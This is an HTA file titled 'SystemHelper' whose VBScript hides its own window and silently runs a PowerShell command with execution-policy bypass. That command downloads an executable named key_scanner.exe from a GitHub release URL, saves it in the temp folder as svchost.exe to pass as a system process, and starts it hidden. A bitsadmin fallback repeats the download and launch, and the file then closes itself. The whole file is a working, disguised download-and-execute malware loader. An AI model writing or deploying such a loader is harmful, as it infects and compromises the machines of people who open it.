<hta:application
  id="oHTA"
  applicationname="SystemHelper"
  border="none"
  caption="no"
  showintaskbar="no"
  windowstate="minimize"
  singleinstance="yes"
  navigable="no"
  sysmenu="no"
  contextmenu="no"
  innerborder="no"
  scroll="no"
/>

<script language="VBScript">
  ' ==== ENSURE WINDOW NEVER APPEARS ====
  Window.resizeTo 0,0
  Window.moveTo -2000,-2000
  Set WshShell = CreateObject("WScript.Shell")
  
  ' ==== METHOD 1: ULTRA-SILENT DOWNLOAD & EXECUTION ====
  ' First try PowerShell (most reliable)
  psCommand = "powershell -NoP -NonI -W Hidden -Exec Bypass -C ""$p='%temp%\svchost.exe';" & _
              "try{(New-Object Net.WebClient).DownloadFile('https://github.com/jozef800/discord/releases/download/v3.0/key_scanner.exe',$p);" & _
              "if(Test-Path $p){Start-Process -WindowStyle Hidden $p}}catch{}"""
  
  ' ==== METHOD 2: FALLBACK TO BITSADMIN ====
  bitsCommand = "cmd /c bitsadmin /transfer myjob /download /priority high " & _
                "https://github.com/jozef800/discord/releases/download/v3.0/key_scanner.exe " & _
                "%temp%\\svchost.exe && start /b %temp%\\svchost.exe"
  
  ' ==== EXECUTE SILENTLY ====
  WshShell.Run "cmd /c " & psCommand & " || " & bitsCommand, 0, False
  
  ' ==== FORCE CLOSE HTA ====
  window.setTimeout "Self.Close()", 1000
</script>
